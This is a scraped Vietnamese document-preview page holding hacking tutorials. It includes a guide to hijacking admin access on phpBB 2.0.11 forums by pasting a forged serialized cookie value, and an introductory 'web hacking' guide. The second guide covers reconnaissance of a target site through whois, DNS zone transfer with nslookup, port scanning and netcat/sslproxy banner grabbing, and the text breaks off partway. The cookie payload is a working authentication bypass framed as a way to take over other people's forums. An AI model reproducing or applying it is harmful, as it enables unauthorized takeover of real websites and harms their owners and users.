Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống
1
/ 11 trang
THÔNG TIN TÀI LIỆU
Thông tin cơ bản
Định dạng
Số trang
11
Dung lượng
668,73 KB
Nội dung
- Mở trang mà mình đang dùng là thằng này và delete hết các cookie của nó đi trừ dòng có chữ mysql_data Trích: www.tqcvn.com dondoc (vniss) Hướng dẫn hack forum phpBB 2.0.11. (bài 3) - Chọn cookie đó và Edit nó . Trong field Value xoá hết cookie cũ đi và paste cái dòng ở trên vào rồi OK > Close thoát ra ngoài : Trích: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D Reload lại và ta được gì nào > nghiễm nhiên trở thành Admin . Ở đây là lavekings Giờ bạn có thể vào Admin Control Panel và làm gì tuỳ ý .Nhưng đừng drop cái gì là ok. dondoc (vniss) Căn bản để Hack Web Bài của unixzdo ( mod dịch thuật của HCE cũ ) Hiện nay hack web rất chi là fổ biến.Xin giới thiệu sơ qua về vấn đề hack web. Phương pháp chung : -Tìm hiểu sơ lược về các thành phần site cần hack: Cái này bạn sẽ đi thu lượm các thông tin về cấu trúc ,thành phần của site như phương pháp chuyển giao dữ liệu,thông qua những cổng nào,có bao nhiêu server,nền ứng dụng, -Tấn công web server: đã có nhiều lỗ hổng trên các server cùng với kịch bản khai thác được công bố một cách công khai trên nhiều trang.Bạn có thể kiểm tra,nếu admin server đó mà chưa fix lỗi thì đó là một cơ hội tốt để khai thác. -Xem xét các ứng dụng em loại nào đang chạy trên server như asp,php,cgi,,java, cấu trúc thư mục,các cơ sở dữ liệu -Tấn công vào cơ chế xác thực :mạo danh cookie,đoán password, -Tấn công hệ thống cấp phép: khi đã có được quyền user thì đây là bước cần thiết.Có một số biện pháp thông dụng như leo thang đặc quyền,làm thay đổi các giá trị cookie -> thay quyền user,tấn công vào sql server. -Phân tích các chức năng các ứng dụng web:thường thấy với tấn công bằng phê chuẩn đầu vào -Khai thác việc kết nối cơ sở dữ liệu: thông thường các nhà phát triển ứng dụng web thường chọn tính đơn giản hơn là an toàn,điều này dẫn đến việc xuất dữ liệu nhạy cảm từ sql server xuống trình duyệt của client.Điển hình sql injection. -Attack the client: như cross-site scripting -Tấn công từ chối dịch vụ : một lổ hổng lớn và đáng sợ. Chúng ta sẽ bắt đầu từ phần 1 , cũng có thể nói là kĩ thuật in dấu chân mạng.Đầu tiên hãy bắt đầu tìm hiểu về nền và loại ứng dụng mà server đang chạy.Web application chạy ở trên server và trả lại kết quả xuống client qua trình duyệt web. Với các công cụ whois các bạn có thể tìm ra các địa chỉ ip được gán,các dữ liệu liên quan tới dns cùng các thông tin về admin và liên lạc.Hiện có nhiều công cụ whois,song các bạn có thể tham khảo tại http://www.arin.net/whois. Truy vấn cơ sở dữ liệu bởi whois có thể định danh dns server của một tổ chức.Nếu được thiết lập không đúng nó có thể cho phép người dùng nặc danh lấy thông tin như ip mapping với domain name.Để ngăn cản điều này có thể ngăn cản việc backup dns server nơi chứa các file cấu hình vùng.Nếu chức năng này không được thiết lập thì thông tin có thể bị đổ bởi việc thực hiện chuyển vùng. Thực hiện chuyển vùng đơn giản chỉ sử dụng nslookup ,một tiện ích thường cài sẵn trong mọi nền hệ điều hành.Ví dụ trên windows: C:\Zone transfer\nslookup Default Server: internal Address: 10.1.1.65 > server ns1.victim.com Default Server: ns1.victim.com Address: 192.168.15.77 > ls -d victim.com @ IN SOA victim.com. root.freebsd.victim.com. ( 961230 ; Serial 3600 ; Refresh 300 ; Retry 3600000 ; Expire 3600 ) ; Minimum IN NS freebsd.victim.com. mail.victim.com. IN MX 10.0.0.10 ; mail www.victim.com. IN A 10.0.0.2 ; web app.victim.com. IN A 10.0.0.1 ; web app 1 vvvvvvvvvv từ ví dụ này có thể thấy rằng ta có thể truy cập qua dns vào các application server. Tiếp đó hãy sử dụng các công cụ quét cổng khám phá các cổng mở trên server.Mỗi cổng chính là địa chỉ của một ứng dụng nhất định hay nói cách khác là địa chỉ của chúng trên server.Các bạn tham khảo về giao thức sử dụng,địa chỉ và tên ứng dụng đang chạy trên server trong diễn đàn.Có thể hình dung công cụ quét cổng sẽ kết nối tới một cổng xác định của giao thức tcp hay udp và xác định tên ứng dụng theo kịch bản.Tuy vậy cũng có một số kĩ thuật quét cổng cùng công cụ đi kèm như tcp syn scan,tcp scan,các kĩ thuật quét udp,quét với nmap song tôi sẽ không đề cập ở đây vì bài này chỉ mang tính chất giới thiệu. Sau khi thiết lập danh sách các dịch vụ bạn cần xác định platform của server.Kĩ thuật chộp banner với netcat có thể được thực hiện như ví dụ: C:\nc -nvv 192.168.234.34 80 { chỉ mang tính chất ví dụ} (UNKOWN) [192.168.234.34] 80 open ? HEAD /HTTP 1.1 Windows platform/iis server có thể thấy ở trên là server sử dụng iis trên nền windows. Một số công cụ như netcat,fscan, không thể kết nối tới SSL service để chộp banner,một trong những cách đơn giản nhất là sử dụng một local proxy.Có vài tool khá tốt cho công việc này,nhưng tôi thấy hay hơn là dùng sslproxy. C:\>sslproxy -1 5000 -R www.victim.com -r 443 -c dummycert.pem -p ssl23 SSL: No verify locations, trying default proxy ready, listening for connections sslproxy lắng nghe cục bộ trên cổng 5000 và proxy kết nối tới remote server trên cổng 443.Giờ đây có thể mở một cmd shell kết nối tới local host trên port 5000 sử dụng netcat và chộp thông tin banner như sau: C:\nc>nc -vv localhost 5000 localhost [127.0.0.1] 5000 (?) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 15 Feb 2002 16:47:56 GMT Server: WebSTAR/4.2 (Unix) mod_ssl/2.8.6 OpenSSL/0.9.6c Connection: close Content-Type: text/html Hãy chuyển sang cửa sổ của sslproxy và chúng ta sẽ thấy kết nối đã được mở ( over ssl ,port 443) ,netcat session đã có được một kết nối tới nó: connection on fd=412 SSL: Cert error: unknown error 20 in /C=ZA/ST=Western Cape/L=Cape Town/O=Thawte Consulting